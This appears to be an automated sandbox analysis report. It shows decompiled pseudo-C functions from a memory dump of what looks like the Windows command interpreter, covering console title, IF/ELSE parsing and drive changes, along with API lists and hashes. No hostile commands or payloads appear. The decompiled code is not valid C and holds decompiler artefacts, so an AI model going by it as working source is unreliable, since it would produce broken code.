                                                      • Opcode ID: a9d6f05eea3824622b05fe84daa31674100f988e946d4ead7e31e15744d3ae3d
                                                      • Instruction ID: 18367b0ddbc910e596ab1725227f54b92bbff755e53f63492bbed25e3de843e3
                                                      • Opcode Fuzzy Hash: a9d6f05eea3824622b05fe84daa31674100f988e946d4ead7e31e15744d3ae3d
                                                      • Instruction Fuzzy Hash: 6A918EB1908619EFCB309FE4CC84AAEBBBAFF44354F164429E105EB616D7319D4ACB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E4A73216E(void* __ebx, void* __edi, signed short __esi, void* __eflags) {
                                                      				void* _t39;
                                                      				intOrPtr* _t49;
                                                      				intOrPtr _t58;
                                                      				void* _t59;
                                                      				intOrPtr _t63;
                                                      				void* _t64;
                                                      				void* _t67;
                                                      
                                                      				_t66 = __esi;
                                                      				_t65 = __edi;
                                                      				_push(0x430);
                                                      				_push(0x4a732280);
                                                      				E4A7313E1(__ebx, __edi, __esi);
                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                      				GetConsoleTitleW(_t67 - 0x430, 0x104);
                                                      				_t3 = _t58 + 0x38; // 0x0
                                                      				_t34 =  *_t3;
                                                      				if( *_t3 == 0) {
                                                      					L36:
                                                      					goto L7;
                                                      				} else {
                                                      					__eflags =  *((short*)(__eax + 2)) - 0x3a;
                                                      					if( *((short*)(__eax + 2)) == 0x3a) {
                                                      						goto L1;
                                                      					}
                                                      					__eax = __ebp - 0x434;
                                                      					__edi = E4A7341DD(__ebx, __ebp - 0x434);
                                                      					 *(__ebp - 0x43c) = __edi;
                                                      					__eflags = __edi - 0xffffffff;
                                                      					if(__edi == 0xffffffff) {
                                                      						L6:
                                                      						E4A733D05(_t58);
                                                      						L7:
                                                      						return E4A7313CA(_t58, _t65, _t66);
                                                      					}
                                                      					__eax = E4A734165(__edi);
                                                      					 *(__ebp - 0x438) = __eax;
                                                      					__eflags = __eax;
                                                      					if(__eax == 0) {
                                                      						L35:
                                                      						goto L7;
                                                      					}
                                                      					__ax =  *0x4a77065c; // 0x2f
                                                      					 *(__ebp - 0x224) = __ax;
                                                      					__eax = 0;
                                                      					 *((short*)(__ebp - 0x222)) = __ax;
                                                      					__eax = __ebp - 0x224;
                                                      					_t15 = __ebx + 0x3c; // 0x0
                                                      					__esi = E4A7322CA( *_t15, __ebp - 0x224, 2);
                                                      					__eflags = __edi - 0xa;
                                                      					if(__edi == 0xa) {
                                                      						__eflags = __esi;
                                                      						if(__esi == 0) {
                                                      							goto L12;
                                                      						}
                                                      						__eax = wcsncmp(__esi, E4A735B40, 4);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							while(1) {
                                                      								L14:
                                                      								__eflags = __esi;
                                                      								if(__esi == 0) {
                                                      									break;
                                                      								}
                                                      								__eflags =  *__esi;
                                                      								if( *__esi == 0) {
                                                      									break;
                                                      								}
                                                      								__eax = __esi;
                                                      								_t16 = __eax + 2; // 0x2
                                                      								__edx = _t16;
                                                      								do {
                                                      									__cx =  *__eax;
                                                      									__eax = __eax + 1;
                                                      									__eax = __eax + 1;
                                                      									__eflags = __cx;
                                                      								} while (__cx != 0);
                                                      								__eax = __eax - __edx;
                                                      								__edi = __eax;
                                                      								__eax = E4A732598(__ecx, __esi);
                                                      								__edi = __edi + 1;
                                                      								__eax = E4A73185A(__esi, __edi, __eax);
                                                      								__eflags =  *(__ebp - 0x434) & 0x00000001;
                                                      								if(( *(__ebp - 0x434) & 0x00000001) != 0) {
                                                      									__eflags = __esi[0] - 0x3a;
                                                      									if(__esi[0] != 0x3a) {
                                                      										goto L19;
                                                      									}
                                                      									__eax =  *__esi & 0x0000ffff;
                                                      									__eax = E4A732B68( *__esi & 0x0000ffff);
                                                      									__eflags = __eax;
                                                      									if(__eax == 0) {
                                                      										_push(0);
                                                      										_push(0xf);
                                                      										L41:
                                                      										__eax = E4A736D44(__ecx);
                                                      										_pop(__ecx);
                                                      										_pop(__ecx);
                                                      										0 = 1;
                                                      										 *0x4a754188 = 1;
                                                      										goto L7;
                                                      									}
                                                      									__eflags =  *(__ebp - 0x43c) - 4;
                                                      									if( *(__ebp - 0x43c) == 4) {
                                                      										goto L19;
                                                      									}
                                                      									__eax =  *__esi & 0x0000ffff;
                                                      									__eax = E4A73395E( *__esi & 0x0000ffff);
                                                      									__eflags = __eax;
                                                      									if(__eax == 0) {
                                                      										goto L19;
                                                      									}
                                                      									_push(0);
                                                      									_push(GetLastError());
                                                      									goto L41;
                                                      								}
                                                      								L19:
                                                      								__eflags =  *(__ebp - 0x434) & 0x00000002;
                                                      								if(( *(__ebp - 0x434) & 0x00000002) != 0) {
                                                      									__eflags =  *__esi -  *0x4a77065c; // 0x2f
                                                      									if(__eflags != 0) {
                                                      										goto L20;
                                                      									}
                                                      									_push(0);
                                                      									_push(0x232a);
                                                      									goto L41;
                                                      								}
                                                      								L20:
                                                      								__esi = E4A73413B(__esi);
                                                      							}
                                                      							__eax = E4A73246C(__ebx);
                                                      							__eflags = __eax;
                                                      							if(__eax != 0) {
                                                      								__eax = E4A7324ED(__eax, __ecx, __eax);
                                                      							}
                                                      							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                      							 *((intOrPtr*)(__ebp - 0x440)) =  *(__ebp - 0x438)(__ebx);
                                                      							 *(__ebp - 4) = 0xfffffffe;
                                                      							E4A7343A7() =  *((intOrPtr*)(__ebp - 0x440));
                                                      							goto L7;
                                                      						}
                                                      					}
                                                      					L12:
                                                      					__eflags = __edi - 0x1f;
                                                      					if(__edi == 0x1f) {
                                                      						goto L14;
                                                      					}
                                                      					__eax = E4A73446E(__edi, __esi);
                                                      					__eflags = __al;
                                                      					if(__al != 0) {
                                                      						goto L36;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      				L1:
                                                      				_t39 = E4A732B68( *_t34 & 0x0000ffff);
                                                      				if(_t39 == 0) {
                                                      					_push(_t39);
                                                      					_push(0xf);
                                                      					L38:
                                                      					E4A736D44(_t59);
                                                      					goto L36;
                                                      				}
                                                      				_t4 = _t58 + 0x38; // 0x0
                                                      				if(E4A73395E( *( *_t4) & 0x0000ffff) != 0) {
                                                      					_push(0);
                                                      					_push(GetLastError());
                                                      					goto L38;
                                                      				}
                                                      				_t5 = _t58 + 0x38; // 0x0
                                                      				_t66 = towupper( *( *_t5) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
                                                      				_t6 = _t58 + 0x38; // 0x0
                                                      				_t49 =  *_t6;
                                                      				_t7 = _t49 + 2; // 0x2
                                                      				_t64 = _t7;
                                                      				do {
                                                      					_t63 =  *_t49;
                                                      					_t49 = _t49 + 2;
                                                      				} while (_t63 != 0);
                                                      				if(_t49 - _t64 >> 1 == 2) {
                                                      					E4A7400DD(_t64, _t66 & 0x0000ffff);
                                                      					goto L35;
                                                      				}
                                                      				goto L6;
                                                      			}











                                                      APIs
                                                      • towupper.MSVCRT ref: 4A731594
                                                        • Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B
                                                      • GetConsoleTitleW.KERNEL32 ref: 4A73218C
                                                      • wcsncmp.MSVCRT(00000000,4A735B40,00000004,00000000,?,00000002,00000000,4A754210,?,?,4A73745B,-00000003,00000000,00000000,00000000,00000000), ref: 4A735B2A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleTitleiswspacetowupperwcsncmp
                                                      • String ID:
                                                      • API String ID: 4235436829-0
                                                      • Opcode ID: 937eacfaf029b3aa0a0d4fb5ec810d482d971c4cb7c354d63376328bed3745e6
                                                      • Instruction ID: eccd163e1be641bb574ffa6a00533c659a164f9c1c0a5c3298b7c74fab19f176
                                                      • Opcode Fuzzy Hash: 937eacfaf029b3aa0a0d4fb5ec810d482d971c4cb7c354d63376328bed3745e6
                                                      • Instruction Fuzzy Hash: C551E9B151DA12A9DBB05FA0CC48BAA3BACDF45751F034455EA42DF083E734CA8DC768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E4A73C2F7(intOrPtr __ecx, signed int _a4) {
                                                      				signed int _v8;
                                                      				char _v528;
                                                      				WCHAR* _v532;
                                                      				wchar_t* _v536;
                                                      				signed int _v540;
                                                      				signed int _v544;
                                                      				wchar_t* _v548;
                                                      				char _v552;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t41;
                                                      				intOrPtr* _t51;
                                                      				intOrPtr* _t55;
                                                      				signed int _t58;
                                                      				WCHAR* _t59;
                                                      				wchar_t* _t64;
                                                      				wchar_t* _t67;
                                                      				void* _t79;
                                                      				signed int _t80;
                                                      				signed int _t81;
                                                      				signed int _t83;
                                                      
                                                      				_t72 = __ecx;
                                                      				_t41 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t41 ^ _t83;
                                                      				_t80 = _a4;
                                                      				_t81 = 0;
                                                      				_v548 = 0;
                                                      				_v536 = 0;
                                                      				if(E4A73C44E(__ecx,  &_v552) != 0 || _v552 == 0) {
                                                      					if(_t80 == _t81) {
                                                      						_v532 = _t81;
                                                      						goto L10;
                                                      					}
                                                      					_t27 = _t80 + 0x3c; // 0x0
                                                      					_t51 = E4A732B0D( *_t27, _t81);
                                                      					_v532 = _t51;
                                                      					if(_t51 == _t81) {
                                                      						goto L12;
                                                      					}
                                                      					_t29 = _t51 + 2; // 0x2
                                                      					_t79 = _t29;
                                                      					do {
                                                      						_t72 =  *_t51;
                                                      						_t51 = _t51 + 2;
                                                      					} while (_t72 != _t81);
                                                      					if(_t51 - _t79 >> 1 < 0x104) {
                                                      						goto L10;
                                                      					}
                                                      					_v540 = 1;
                                                      					goto L35;
                                                      				} else {
                                                      					_t70 = 1;
                                                      					_v540 = 1;
                                                      					_t55 = E4A73C56B(__ecx);
                                                      					_t72 = 0x40002748;
                                                      					_v536 = _t55;
                                                      					if(_t55 == 0) {
                                                      						L35:
                                                      						_push(_t81);
                                                      						_push(8);
                                                      						E4A736D44(_t72);
                                                      						L18:
                                                      						return E4A7313A9(_v540, _t70, _v8 ^ _t83, _t79, _t80, _t81);
                                                      					}
                                                      					_t9 = _t55 + 2; // 0x2
                                                      					_t79 = _t9;
                                                      					do {
                                                      						_t72 =  *_t55;
                                                      						_t55 = _t55 + 2;
                                                      					} while (_t72 != 0);
                                                      					_t58 = _t55 - _t79 >> 1;
                                                      					_v544 = _t58;
                                                      					if(_t58 >= 0x104) {
                                                      						L15:
                                                      						_t81 = 0;
                                                      						if(_v536 != 0) {
                                                      							LocalFree(_v536);
                                                      						}
                                                      						if(_v540 != _t81) {
                                                      							goto L35;
                                                      						} else {
                                                      							goto L18;
                                                      						}
                                                      					}
                                                      					_t59 = E4A731896(0x208);
                                                      					_v532 = _t59;
                                                      					if(_t59 == 0) {
                                                      						goto L15;
                                                      					}
                                                      					_v548 = 1;
                                                      					E4A73185A(_t59, 0x104, _v536);
                                                      					if(_t80 == 0) {
                                                      						_t70 =  &_v528;
                                                      						if(GetConsoleTitleW(_t70, 0x104) == 0) {
                                                      							L13:
                                                      							if(_v532 != 0) {
                                                      								E4A73142E(_v532);
                                                      							}
                                                      							goto L15;
                                                      						}
                                                      						_t80 = wcsstr;
                                                      						_t64 = wcsstr(_t70, _v536);
                                                      						_pop(_t72);
                                                      						if(_t64 != 0) {
                                                      							_v544 = _v544 + _v544;
                                                      							while(1) {
                                                      								_t70 = _t70 + _v544;
                                                      								_t67 = wcsstr(_t70, _v536);
                                                      								_pop(_t72);
                                                      								if(_t67 == 0) {
                                                      									goto L27;
                                                      								}
                                                      							}
                                                      						}
                                                      						L27:
                                                      						if(E4A7320A9(0x104, _v532, 0x104, _t70) == 0) {
                                                      							L10:
                                                      							_t81 = 0;
                                                      							if(_v532 != 0) {
                                                      								SetConsoleTitleW(_v532);
                                                      								 *0x4a754083 = 0;
                                                      							}
                                                      							L12:
                                                      							_v540 = _t81;
                                                      							if(_v548 == _t81) {
                                                      								goto L15;
                                                      							}
                                                      							goto L13;
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      					_t14 = _t80 + 0x3c; // 0x0
                                                      					_t80 =  *_t14;
                                                      					if(_t80 == 0) {
                                                      						_v540 = _v540 & _t80;
                                                      						goto L13;
                                                      					}
                                                      					if(E4A7320A9(0x104, _v532, 0x104, _t80) != 0) {
                                                      						goto L13;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      			}

                                                      APIs
                                                        • Part of subcall function 4A73C56B: FormatMessageW.KERNEL32(00001900,00000000,74EC5129,00000000,00000000,00000000,74EC5129,?,?,?,4A73C353,40002748,?,-00000003,74EC5129,00000000), ref: 4A73C590
                                                      • SetConsoleTitleW.KERNEL32(?), ref: 4A73C3E1
                                                      • LocalFree.KERNEL32(?,00000000,00000000,?,-00000003,74EC5129,00000000), ref: 4A73C420
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleFormatFreeLocalMessageTitle
                                                      • String ID:
                                                      • API String ID: 3649520976-0
                                                      • Opcode ID: b957246106e7d4abe8aaf5b60eb549f75f63f8166e70b7871edf69636f90e3ba
                                                      • Instruction ID: 57abdbf41685aa6f2ec3fc5de3fd1840bc801d1bf9899c3b2253262ef7f4a196
                                                      • Opcode Fuzzy Hash: b957246106e7d4abe8aaf5b60eb549f75f63f8166e70b7871edf69636f90e3ba
                                                      • Instruction Fuzzy Hash: 4751D07198962DABDB719B24CC8C6DEBFB8EF14750F1204E5D008A6152DB708E9CCF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E4A736098(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
                                                      				signed int _v0;
                                                      				signed int __ebx;
                                                      				void* __ebp;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t20;
                                                      				void* _t23;
                                                      				void* _t27;
                                                      				void* _t29;
                                                      
                                                      				_t25 = __ecx;
                                                      				asm("das");
                                                      				 *_t25 =  *__ecx + __ecx;
                                                      				 *__eax =  *__eax + __eax;
                                                      				_pop(__edi);
                                                      				_pop(__esi);
                                                      				__ebp = __esp;
                                                      				__edi = 0x4a768640;
                                                      				__ebx = 0;
                                                      				__imp___wcsicmp(L"IF/?", __edi, __esi, __ebx, __ecx, __ebp);
                                                      				_pop(__ecx);
                                                      				__ecx = 0x4a768640;
                                                      				__eflags = __eax;
                                                      				if(__eax == 0) {
                                                      					__eax = 0x4a754610;
                                                      					_t10 = __eax + 2; // 0x4a754612
                                                      					__edx = _t10;
                                                      					do {
                                                      						__cx =  *__eax;
                                                      						__eax = __eax + 1;
                                                      						__eax = __eax + 1;
                                                      						__eflags = __cx;
                                                      					} while (__cx != 0);
                                                      					__eax = __eax - __edx;
                                                      					__eax = __eax >> 1;
                                                      					__ecx = 0;
                                                      					__ebx = 0;
                                                      					 *((short*)(0x4a768640 + __eax * 2)) = __cx;
                                                      					__ebx = 1;
                                                      					goto L4;
                                                      				} else {
                                                      					L4:
                                                      					__esi = E4A7329E9(__ecx, 0x2c);
                                                      					__eflags = __ebx;
                                                      					if(__eflags != 0) {
                                                      						__eax = 0x2f;
                                                      						 *0x4a768640 = __ax;
                                                      						__eax = 0x3f;
                                                      						 *0x4a768642 = __ax;
                                                      						__eax = 0;
                                                      						 *0x4a768644 = __ax;
                                                      					} else {
                                                      						__eax = E4A731CBF(0);
                                                      					}
                                                      					__eax = E4A735228(__ebx, __edx, __edi, __esi, __eflags, __edi, 0x2c);
                                                      					__eflags = __al;
                                                      					if(__al != 0) {
                                                      						 *(__esi + 0x38) =  *(__esi + 0x38) & 0x00000000;
                                                      						 *__esi = 0x3c;
                                                      						goto L16;
                                                      					} else {
                                                      						__ebx = 0;
                                                      						_v0 = 0;
                                                      						__eflags =  *0x4a754081 - __bl; // 0x0
                                                      						if(__eflags == 0) {
                                                      							L9:
                                                      							__eax = E4A731D26(__eax, __ebx, __ebx, __ebx);
                                                      							L10:
                                                      							__eax = E4A73617F(__ecx, __ebx);
                                                      							 *(__esi + 0x3c) = __eax;
                                                      							__eflags = __eax - __ebx;
                                                      							if(__eax != __ebx) {
                                                      								__eflags = _v0 - __ebx;
                                                      								if(_v0 != __ebx) {
                                                      									__eflags =  *__eax - 0x38;
                                                      									if( *__eax == 0x38) {
                                                      										__eax =  *(__eax + 0x3c);
                                                      									}
                                                      									 *((intOrPtr*)(__eax + 0x40)) = 2;
                                                      								}
                                                      							}
                                                      							__eax = E4A731C59(__ebx, 0x2c);
                                                      							 *(__esi + 0x40) = __eax;
                                                      							__eflags = __eax - __ebx;
                                                      							if(__eax == __ebx) {
                                                      								__eax = E4A74EE72();
                                                      							}
                                                      							__eax = E4A7329D5();
                                                      							__eflags = __eax;
                                                      							if(__eax != 0) {
                                                      								__eax = E4A731CBF(__ebx);
                                                      								__imp___wcsicmp(L"ELSE");
                                                      								_pop(__ecx);
                                                      								__ecx = __edi;
                                                      								__eflags = __eax;
                                                      								if(__eax == 0) {
                                                      									_t16 =  *0x4a754178; // 0x0
                                                      									 *((intOrPtr*)(_t29 + 0x44)) = E4A732041(_t16 + _t16);
                                                      									E4A73185A(_t18,  *0x4a754178, _t27);
                                                      									_t20 = E4A731C59(_t23, 0x2c);
                                                      									 *((intOrPtr*)(_t29 + 0x48)) = _t20;
                                                      									if(_t20 == _t23) {
                                                      										E4A74EE72();
                                                      									}
                                                      								} else {
                                                      									__eax = E4A731D26(__eax, __ebx, __ebx, __ebx);
                                                      								}
                                                      							}
                                                      							L16:
                                                      							return _t29;
                                                      						}
                                                      						__imp___wcsicmp(E4A736098);
                                                      						__ecx = __edi;
                                                      						_pop(__ecx);
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							_v0 = 1;
                                                      							goto L10;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: ELSE$IF/?
                                                      • API String ID: 2081463915-1134991328
                                                      • Opcode ID: 4404cb1212bde208b4c070e57e1f6c213fd54debe313dd68e5d64b7fbd7ac4c9
                                                      • Instruction ID: 5360936da6638a001b675683b0e27ac973a309cbd7f2e8f3b42ab6f31403a4c4
                                                      • Opcode Fuzzy Hash: 4404cb1212bde208b4c070e57e1f6c213fd54debe313dd68e5d64b7fbd7ac4c9
                                                      • Instruction Fuzzy Hash: 8E41D6B115DB52AEE7705BB5C899A9B7BBCDF022A1F02442AE242DA543DB64C84DC321
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E4A7410A5(void* __eax, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a28) {
                                                      				char _v8;
                                                      				void* __ecx;
                                                      				int _t22;
                                                      				void* _t25;
                                                      				signed int _t33;
                                                      				void* _t37;
                                                      				signed int _t38;
                                                      				void* _t39;
                                                      				void* _t40;
                                                      				void* _t45;
                                                      				void* _t46;
                                                      				intOrPtr _t47;
                                                      				intOrPtr _t50;
                                                      				void* _t52;
                                                      				void* _t58;
                                                      				intOrPtr* _t59;
                                                      
                                                      				_t59 = _a16;
                                                      				_v8 = 0;
                                                      				 *0x4a754120 = 0;
                                                      				__imp___get_osfhandle(_a4, _a8, _a12, _t59, 0, _t52, _t58, _t39, _t45);
                                                      				_pop(_t46);
                                                      				_t22 = ReadFile(__eax, ??, ??, ??, ??);
                                                      				_t40 = GetLastError;
                                                      				if(_t22 == 0) {
                                                      					L17:
                                                      					 *0x4a754128 = GetLastError();
                                                      					_t25 = E4A733B03(E4A733AB3(_a4), _t46, _a24);
                                                      					_push(_a24);
                                                      					if(_t25 != 0) {
                                                      						E4A733AB3();
                                                      					} else {
                                                      						E4A733AB3();
                                                      						DeleteFileW(_a28);
                                                      					}
                                                      					L4A74F2D7(_t46,  *0x4a754128, 1);
                                                      					asm("int3");
                                                      					E4A73185A(_a8, _t40, 0);
                                                      					return _v8;
                                                      				} else {
                                                      					_t50 =  *_t59;
                                                      					if(_t50 == 0) {
                                                      						if(GetLastError() == 0x3e3) {
                                                      							goto L17;
                                                      						} else {
                                                      							_t50 =  *_t59;
                                                      							if(_t50 != 0) {
                                                      								goto L2;
                                                      							} else {
                                                      								 *0x4a754128 = 0;
                                                      								_t37 = 0;
                                                      							}
                                                      							goto L9;
                                                      						}
                                                      					} else {
                                                      						L2:
                                                      						_t47 = _a20;
                                                      						_t33 =  *(_t47 + 0x1c);
                                                      						if((_t33 & 0x0000c000) == 0) {
                                                      							if(_t50 < 2 ||  *_a8 != 0xfeff) {
                                                      								_t38 = _t33 | 0x00008000;
                                                      							} else {
                                                      								_t38 = _t33 | 0x00004000;
                                                      							}
                                                      							 *(_t47 + 0x1c) = _t38;
                                                      						}
                                                      						if(( *(_t47 + 0x1c) & 0x00008002) == 0x8002) {
                                                      							E4A74E4DC(1, _a8, _t59,  &_v8);
                                                      							if( *_t59 !=  *_t59) {
                                                      								 *0x4a754120 = 1;
                                                      							}
                                                      						}
                                                      						_t37 = 1;
                                                      						L9:
                                                      						return _t37;
                                                      					}
                                                      				}
                                                      			}




















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 3588551418-0
                                                      • Opcode ID: 1d1cb8b3638c047d82fa3974b58015d26034cdbc4e3411891b7b6e35b0ea40be
                                                      • Instruction ID: 1974d3cc765b7b6dfa8c2b801d1fa4ef3581baeafe95f98b40535f76a40f821d
                                                      • Opcode Fuzzy Hash: 1d1cb8b3638c047d82fa3974b58015d26034cdbc4e3411891b7b6e35b0ea40be
                                                      • Instruction Fuzzy Hash: 403121B1608149EFDF719F62C888D8E7F7AEB853A0B228529F801D7551CB35DD08CB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E4A7400DD(void* __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				short _v10;
                                                      				short _v12;
                                                      				void* _v14;
                                                      				char _v16;
                                                      				short _v530;
                                                      				short _v532;
                                                      				short _v534;
                                                      				short _v536;
                                                      				int _v540;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t20;
                                                      				short _t22;
                                                      				short _t25;
                                                      				WCHAR* _t28;
                                                      				short _t31;
                                                      				int _t37;
                                                      				void* _t45;
                                                      				void* _t46;
                                                      				void* _t51;
                                                      				WCHAR* _t52;
                                                      				void* _t53;
                                                      				signed int _t54;
                                                      
                                                      				_t51 = __edx;
                                                      				_t20 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t20 ^ _t54;
                                                      				_t22 = 0x3d;
                                                      				_v16 = _t22;
                                                      				_v14 = _a4 + 0x40;
                                                      				_t25 = 0x3a;
                                                      				_v12 = _t25;
                                                      				_v10 = 0;
                                                      				_t28 = E4A732070( &_v16);
                                                      				_t53 = SetCurrentDirectoryW;
                                                      				_t45 = SetErrorMode;
                                                      				_t52 = _t28;
                                                      				if(_t52 == 0) {
                                                      					L4:
                                                      					_v536 = _v14;
                                                      					_v534 = _v12;
                                                      					_t31 =  *0x4a770664; // 0x5c
                                                      					_v532 = _t31;
                                                      					_v530 = 0;
                                                      					E4A731730( &_v16,  &_v536);
                                                      					_t37 = SetCurrentDirectoryW( &_v536);
                                                      					if(_t37 == 0) {
                                                      						_push(_t37);
                                                      						_push(GetLastError());
                                                      						E4A736D44(_t46);
                                                      					}
                                                      					if(_t52 != 0) {
                                                      						SetErrorMode(_v540);
                                                      					}
                                                      					L2:
                                                      					return E4A7313A9(E4A732C56(_t45, _t51, _t52, 0x4a755260, 0x104, 0), _t45, _v8 ^ _t54, _t51, _t52, _t53);
                                                      				}
                                                      				if(SetCurrentDirectoryW(_t52) == 0) {
                                                      					_v540 = SetErrorMode(1);
                                                      					goto L4;
                                                      				}
                                                      				goto L2;
                                                      			}





























                                                      APIs
                                                        • Part of subcall function 4A732070: GetEnvironmentVariableW.KERNEL32(?,4A760640,00002000,75A9F670,?,?,4A73BEFF,00000000), ref: 4A73208E
                                                      • SetCurrentDirectoryW.KERNEL32(00000000,00000006,4A76C642,0000233F,00000000), ref: 4A740133
                                                      • SetErrorMode.KERNEL32(00000001), ref: 4A749BA9
                                                      • SetCurrentDirectoryW.KERNEL32(?,00000006,?,00000006,4A76C642,0000233F,00000000), ref: 4A749BF4
                                                      • GetLastError.KERNEL32(00000000), ref: 4A749BFB
                                                      • SetErrorMode.KERNEL32(?), ref: 4A749C17
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Error$CurrentDirectoryMode$EnvironmentLastVariable
                                                      • String ID:
                                                      • API String ID: 295791303-0
                                                      • Opcode ID: e95f97d970739ec8a5f8c420da44df3226b9599e3fae6b779df2eef4db9de96e
                                                      • Instruction ID: 98d5ec9bdd6314ceb8c752b7ccc8e1248bc38a1af9d492b3ca26335f29fbe329
                                                      • Opcode Fuzzy Hash: e95f97d970739ec8a5f8c420da44df3226b9599e3fae6b779df2eef4db9de96e
                                                      • Instruction Fuzzy Hash: 4721077A90420DAADF20DBF4CC45FDEB7BCAF44740F110096E508EB241EA308A49CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A737BDB() {
                                                      				int _t4;
                                                      				signed int _t7;
                                                      				void* _t8;
                                                      				int _t10;
                                                      				signed int _t12;
                                                      				int* _t15;
                                                      				void* _t18;
                                                      				void* _t19;
                                                      				intOrPtr _t21;
                                                      
                                                      				_t4 = GetConsoleOutputCP();
                                                      				 *0x4a7541b8 = _t4;
                                                      				if(GetCPInfo(_t4, 0x4a754260) == 0) {
                                                      					_t7 = GetThreadLocale() & 0x000003ff;
                                                      					__eflags = _t7 - 0x11;
                                                      					if(_t7 != 0x11) {
                                                      						__eflags = _t7 - 4;
                                                      						if(_t7 == 4) {
                                                      							L8:
                                                      							 *0x4a754266 = 0x81;
                                                      							 *0x4a754267 = 0xfe;
                                                      							 *0x4a754268 = 0;
                                                      							 *0x4a754269 = 0;
                                                      							goto L1;
                                                      						}
                                                      						__eflags = _t7 - 0x12;
                                                      						if(_t7 != 0x12) {
                                                      							 *0x4a754266 = 0;
                                                      							 *0x4a754267 = 0;
                                                      							goto L1;
                                                      						}
                                                      						goto L8;
                                                      					}
                                                      					 *0x4a754266 = 0x81;
                                                      					 *0x4a754267 = 0x9f;
                                                      					 *0x4a754268 = 0xe0;
                                                      					 *0x4a754269 = 0xfc;
                                                      					 *0x4a75426a = 0;
                                                      					 *0x4a75426b = 0;
                                                      				}
                                                      				L1:
                                                      				_t8 = memset(0x4a754e40, 0, 0x100);
                                                      				_t19 = _t18 + 0xc;
                                                      				_t21 =  *0x4a754266; // 0x0
                                                      				if(_t21 != 0) {
                                                      					_t15 = 0x4a754267;
                                                      					while(1) {
                                                      						_t8 =  *_t15;
                                                      						__eflags = _t8;
                                                      						if(_t8 == 0) {
                                                      							break;
                                                      						}
                                                      						_t1 = _t15 - 1; // 0x0
                                                      						_t12 =  *_t1 & 0x000000ff;
                                                      						_t8 = _t8 & 0x000000ff;
                                                      						__eflags = _t12 - _t8;
                                                      						if(_t12 <= _t8) {
                                                      							_t10 = _t8 - _t12 + 1;
                                                      							__eflags = _t10;
                                                      							_t2 = 0x4a754e40 + _t12; // 0x4a754e40
                                                      							_t8 = memset(_t2, 1, _t10);
                                                      							_t19 = _t19 + 0xc;
                                                      						}
                                                      						_t15 =  &(_t15[0]);
                                                      						__eflags =  *(_t15 - 1);
                                                      						if( *(_t15 - 1) != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					 *0x4a754084 = 1;
                                                      					__eflags =  *0x4a754267; // 0x0
                                                      					if(__eflags == 0) {
                                                      						goto L2;
                                                      					}
                                                      					return _t8;
                                                      				}
                                                      				L2:
                                                      				 *0x4a754084 = 0;
                                                      				return _t8;
                                                      			}













                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: memset$ConsoleInfoLocaleOutputThread
                                                      • String ID:
                                                      • API String ID: 1263632223-0
                                                      • Opcode ID: 31e129cde2bd31c72010661b4d820c88308177da0ee3fdb41a9ca167d10596a9
                                                      • Instruction ID: 8939eb4e7d9c6b7cdf2a6668382b1ce15f883acf48e4cdc59e13c2242e23d28c
